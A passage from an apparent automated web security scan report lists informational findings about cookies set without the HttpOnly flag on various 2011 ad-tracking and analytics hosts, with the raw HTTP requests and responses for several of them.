Confidence:	Certain
Host:	http://sm6.sitemeter.com
Path:	/js/counter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

IP=173%2E193%2E214%2E243; path=/js

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/counter.asp?site=sm6damnhippy HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sm6.sitemeter.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7266
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:45 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...

11.186. http://social.msdn.microsoft.com/Search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:45:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.187. http://social.msdn.microsoft.com/search/en-US/en-USebb6e previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/search/en-US/en-USebb6e

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:54:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.188. http://sourceforge.net/projects/hoytllc-vcloud/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/projects/hoytllc-vcloud/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sf.consume=018e8d654755b068e6bd689778eb35747982a299gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDhkMmQ2M2RiZTY0Mjk3ODE0NTIzNjFhYWRmOWFhYjIxcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZTJhNTEyNTkxYWE5MTYxNzMwMDE3NjBxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB04qUSbQlfVUOX2NyZWF0aW9uX3RpbWVxDkdB04qUSZFFB3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/hoytllc-vcloud/ HTTP/1.1
Host: sourceforge.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://home.live.com/search?query=h02332

Response

11.189. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true,key=tidaltv:value=92c08058-8f00-46cd-96c5-b9929eaefbf9:expiresAt=Tue+Sep+20+21%3A48%3A36+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-2043 06:35:16 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.190. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1311273774; domain=.mathtag.com; path=/; expires=Fri, 20-Jul-2012 18:42:54 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.191. http://t4.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t4.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fwww%2Em86security%2Ecom%2Fproducts%2Fweb%5Fsecurity%2Fm86%2Dweb%2Dfiltering%2Dreporting%2Dsuite%2Easp; expires=Sat, 23-Jul-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.m86security.com/&p=http%3A//www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp&i=13065 HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=251737230614108; loop=http%3A%2F%2Fwww%2Em86security%2Ecom%2F; ASPSESSIONIDSAARACBQ=HELBDJEAICILIIIBPOCIGCLH

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 23 Jul 2011 03:49:50 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Em86security%2Ecom%2Fproducts%2Fweb%5Fsecurity%2Fm86%2Dweb%2Dfiltering%2Dreporting%2Dsuite%2Easp; expires=Sat, 23-Jul-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

11.192. http://tags.bluekai.com/ids previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/ids

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=kD7giLV5c/WBvF/1; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
bkc=KJyfh1U9ycm/QDsZPLmwiRs5THYxqXKB0G2Cx4OU9dZqBp1y2s53IeW01/e8N3tG4JObseXUue9l1eOA/waOXMeI43ObE3e26DMXDf3G4JObsaImkTWCxoVHRq6tQF2sMxsaeN/wTddiRtY/Fz7/D/wWM6eMCyn+xmSe21wT7WY8F51jsW3HIY7B3cpcOkxIi/qhQD8MLvraXJZQde9rPcTGsC2AwTMwesxe9B+KwuX=; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrqHZHoIn90cQw/3emSoCZAZvDRsrGAVSuSbJQRohg3VvHqZrZqJSDRZJLRo3jjsO3d3xmgkKOARKOi1/XoB9fnuEDlvL7nUStFT9xOg6O4q; expires=Tue, 17-Jan-2012 19:32:58 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.193. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e2ad0c6; expires=Mon, 25-Jul-2011 13:46:46 GMT; path=/; domain=.bluekai.com
bk=Mu2wa33Jr4td8JkA; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWN/PaWDOdedztqusq2nea/A0JJH66u/wA9HPyRMRGtT6YHo+vvVZSuCjZbZQAhus3xVBut0LoGQShWGAqugMPaxZXywsWx+0yIupo7op7F7nrRBwIb8288ff7+7h9VWxLYfed7POG9HXrWIbxSfburJym36QjnDpJC7TbVgbVzNpN5t673FCbHw2AoU5WFpFf/deHCyh1c2mYkZmIPMBKI77J11NmXtAJA2ffaCqJ95lQBCMkzK+9Wo+aTCtRsx7IluFe5cIZznCJzNntZIKWQbx4w3xKkapEX62IIUF3sjpbKXuwVXHF4NlmK1N/5+VTayES/6pN5IZ9/Dwe/ySFWFrpEcvp5E4VFpenuVm3FMDO+hMVSmP8bQdj/ZQ1YObchtVS/6h0L7JysqSxRbi6ldtunBXzGIKQEEvS4QoA48FZSmPl8OKlr5OLRYor4GdqsSTblKOZZqhK+mTBVbQ5FMspsdNBypJUNOXt7BQuA/U2jX+WIbD7BbrdHzLlHxz84ZRXKkLfjnpljJMd3ArUfvqICIWIMIfNSjfZ0D87Mke3gFJ+lljBsshTPpWqKtxECd7fHqztsVBv2FB5I4NzXrD58AsX8sdY9grgXBMHWcBuINxpMzn1lNWrBDgTTvXlhakmI2XQNwcmvHuof8E52XKUuz4SHDZFBU8FAC03K3mmGrOdVUKk3M0cuEUqgOR7gPDDq7lE3l87cebteUrD0F6d4KIBk9OgAmUyhtFVRFhPFBb0FpK+fdbIDCcBZwh8U73E2TQyjVa2qGdeAHFdJeZmmPJ0Mo6HlDJXiH4AswJ8G8UFkFwJOndq7ujl3UjG8U5kYrf6K9MXLg1qdPleAL4DjpE6ObKWCbIoq6p/e6PXt4Bs44kWfU7vpjggZMUdgX5KZkUrZuesZrkdJEXrxT4R1VOpEFpJUZIzorb+dIJQwCJ5m7L3HqBwBX8Hw6rc1PInbTxr2cNe0r7We28hFNyTvaSe0fo6tbVpwwPdTcysLo+9==; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101E8txzLwv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYuvCkf; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
bkw5=KJha6nNnxkWROFe75/w6sAs6a/JeQPYutBqcoW+O/Rg6eNhYzsLgin9wtGwQOrWDtvg5CYM3lfiMATjextoemWEFXhbC8UKTfdmK288ptiA9qQOUkAwDNQYe3w+bY0EVoRxsgQtxh+/VANjLEZ3j7Blp/zLIf74d26p+usAbyBLWA1EfBCw4bjKOsI7vZxe4mi6FUTLTiuN7/vbGS5alrCF6udNH/8F9vagNSal+KKpd2eYKfELe5PCZm7F1+vXI7Zo7aUvIfOA2rsHwbRoKCwxrjWX2qLxc2u7mDbXZMvuPAObo80cgqG4m5aC8c+WULq/7BTXWbe799gJ8l+0KoPuyuU1uZ15FyuSzBHy7uUZ+aaoaINgXfhdE4al/; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.194. http://tags.bluekai.com/site/2751 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2751

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=06DM01V5c/WBvF/1; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
bkc=KJpqpXU9ycZ/QuWbDXmwiRsOREIx46GUkHdeQrenXE/yHvQ013pUNFOMCwn43esQXWc3R4h449y1LEzjsV3xIOaGdaYQczCXAcTR7h1G+lzb961oWMIksjUFt/evO2Wyw+OoecSNWeTEkOdsCzGwHKmef94hZRaL9/Vgv1T=; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrRhZHoIn9h0F9y1w9psWKVZ9P7ooijkVq7g+EUX9OtdYfX=; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.195. http://tags.bluekai.com/site/365 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/365

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=R4SalLV5c/WBvF/1; expires=Tue, 17-Jan-2012 18:01:12 GMT; path=/; domain=.bluekai.com
bkc=KJpnjVHQRs8QR1M/Nw9e1Ck0QDx1YTvd7TrOQ41x9616WFIDniG4oOfskIBkR/CxjVHRgTlQFNaMxmseN1wTFdQRssJF1MnD/wWM6wiCxerxIue21eT7DsfF59SsDiHIuM13lfWOkxIiRU0Q6hMLSiaXJiQdM9rPcTgsO2AwTM1etxYGii6S; expires=Tue, 17-Jan-2012 18:01:12 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.196. http://trk.etrigue.com/track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trk.etrigue.com
Path:	/track.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

b790=WzU3NTgwNiwtMSwtMSwtMSwtMSw5OTA0MzQsMjIzMTcyOV0%3D; expires=Mon, 19-Dec-2011 19:55:56 GMT; path=/
a790exit=1311364556; expires=Mon, 19-Dec-2011 19:55:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track.php?ie=1&a790=&b790=&a790exit=&a=790&u=http%3A%2F%2Fwww.paloaltonetworks.com%2Fcam%2Fswitch%2Findex.php%3Fts%3Dscmag&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&t=1311365721223 HTTP/1.1
Host: trk.etrigue.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paloaltonetworks.com/cam/switch/index.php?ts=scmag

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
Set-Cookie: b790=WzU3NTgwNiwtMSwtMSwtMSwtMSw5OTA0MzQsMjIzMTcyOV0%3D; expires=Mon, 19-Dec-2011 19:55:56 GMT; path=/
Set-Cookie: a790exit=1311364556; expires=Mon, 19-Dec-2011 19:55:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 19:55:55 GMT
Content-Length: 142

etrigueCB790({"name":"b790","value":"WzU3NTgwNiwtMSwtMSwtMSwtMSw5OTA0MzQsMjIzMTcyOV0="});etrigueCB790({"name":"a790exit","value":1311364556});

11.197. http://uat.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uat.netmng.com
Path:	/pixel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

evo5=csmq4atf04cxa%7CIn4F0BaOvaSAfbAB87TKJGnnyYb0mL3oKgeFrwk7WLLSNJjmSFe3wmJCAYNWqS6SNECrpaPuXV%2Bup99Jtkwx7QFt5OHNaJ%2F0ZiaeEJZDsokWcJfPcwOJ0mSk1OnsbgzjSoJS5DJXSIb3xkyoob04Gw1%2B%2BOQxODX8iYg8fJRDMZ8gd0G34z3Ug6l5NESHBTI4Rw2f9XzBy5yK08dq%2F1TbmclPdNYl5bm7%2FWeHXVCOxIpFjgRwTqfCpQICJHp2RtzJQIj1X%2BpbuBCWT4fhCheYiuJddspGbTT5Hw0nFrekmMzhqK2wFMO8nd1CfJbOYmiidLwkNFzXIafE3J8m9C03QLnEy1GU8rOM226GmVUFMnOl2mrg1JzjDIHSjgTKF9qnCs07my410DDuZ%2F4r2nBhk%2Brbq1Jxjp3hALbn6ep60kKSuRsUMcxuvkKYXnYthYKX6b9G3yNUg%2Fcv5tZ5ePFUtSXqx0hatSxRmUNnBcAOHbJxRHn9gumDP56ULZa2A%2FiaEpGOCamEhVBr7314xLR7HR9oz%2BT2KgEQRR3D1y%2BIb5ne4n6I3OKK2vTIGOI%2B4wyjRBW6B5AX8cAfj3gV%2FS%2B2zqS5vxpVr%2FZitxx%2FqQMPVQYIFi8RVbmF%2FWpky2f0zZu2ChLyH4gMkAubOjXV%2FKOn2ag5%2FVKXaj3dp9ig2SUsb7B22Zk%2Br9fHJfTSWZnHAlc9ZtR0dCizD0KUCIqJbMwgx4klXkGql%2Btf%2Flo%2F1X8IWxsJDTkqh8aSAUMlnyiWsuJoRVPcFfq1O4%2FOILzSEhjNRuskw6dEk%2BeK2VJ4EA6t4tU%3D; expires=Sat, 21-Jan-2012 20:31:11 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.198. http://user.lucidmedia.com/clicksense/user previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://user.lucidmedia.com
Path:	/clicksense/user

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:42:53 GMT; Path=/
2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:42:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.199. http://user.lucidmedia.com/clicksense/user/browser previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://user.lucidmedia.com
Path:	/clicksense/user/browser

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:01:14 GMT; Path=/
2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:01:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.200. http://vap2den1.lijit.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vap2den1.lijit.com
Path:	/www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_OABLOCK[785]=1311396715; expires=Mon, 22-Aug-2011 04:51:55 GMT; path=/; domain=.lijit.com
%5FOABLOCK%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
%5FOACAP%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
%5FOASCAP%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
OABLOCK=785.1311396555; expires=Mon, 22-Aug-2011 04:51:55 GMT; path=/; domain=.lijit.com
OACAP=785.1; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
OASCAP=785.1; path=/; domain=.lijit.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.201. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.202. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.203. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.204. http://visualstudiogallery.msdn.microsoft.com/globalresources/scripts/ms2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/globalresources/scripts/ms2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=15552000
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 19:39:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:21 GMT; path=/
Server: GALS01
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 02:01:20 GMT
Content-Length: 12210

var fl = 0,
sessionId = "",
sessionDuration = 1800000,
sessionCookieName = "MC0",
cookieDisabled = 0,
metaTags = "",
customTags = "",
pvInfo = [],
clickInfo = "",
q
...[SNIP]...

11.205. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:03:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.206. http://visualstudiogallery.msdn.microsoft.com/site/favorites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/favorites

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:09:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.207. http://visualstudiogallery.msdn.microsoft.com/site/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/site/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:03:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.208. http://web2.checkm8.com/adam/detect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/adam/detect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cm8dccp=1311365646;Path=/;Expires=Sat, 23-Jul-2011 20:14:06 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play= HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.24 ny-ad14
Set-cookie: cm8dccp=1311365646;Path=/;Expires=Sat, 23-Jul-2011 20:14:06 GMT;
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 697
Connection: close
Content-Type: text/html

window.CM8DispatcherApps=window.CM8DispatcherApps||[];
window.CM8DispatcherApps.push('http://web2.checkm8.com/adam/detected?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=ht
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A=d1LS96w908JSvc9HH6Mca;Path=/;
C=o3LS96wE8Z4ZcdacapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:31 GMT;
M=m1LS96wc2Z5oucIXbaaaaaaaaa;Path=/;Expires=Thu, 06-Dec-2074 23:47:31 GMT;
P=n1LS96weL4WbagaakgYU5fagaakg;Path=/;Expires=Thu, 06-Dec-2074 23:47:31 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: dt=96,20110722201409,OS=WIN7&JE=1&UL=en&RES=RS21&CE=1311365646; A=d1LS96wO2V5Ywc9HH6Mca; C=o1LS96wMGNV6dbabapHWOZGc; M=m1LS96wb2Z5oacIXbaa; O=e1LS96wdgGJHlXra; P=n1LS96wcL4WbagYU5fag

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:11 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=d1LS96w908JSvc9HH6Mca;Path=/;
Set-cookie: C=o3LS96wE8Z4ZcdacapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:31 GMT;
Set-cookie: M=m1LS96wc2Z5oucIXbaaaaaaaaa;Path=/;Expires=Thu, 06-Dec-2074 23:47:31 GMT;
Set-cookie: P=n1LS96weL4WbagaakgYU5fagaakg;Path=/;Expires=Thu, 06-Dec-2074 23:47:31 GMT;
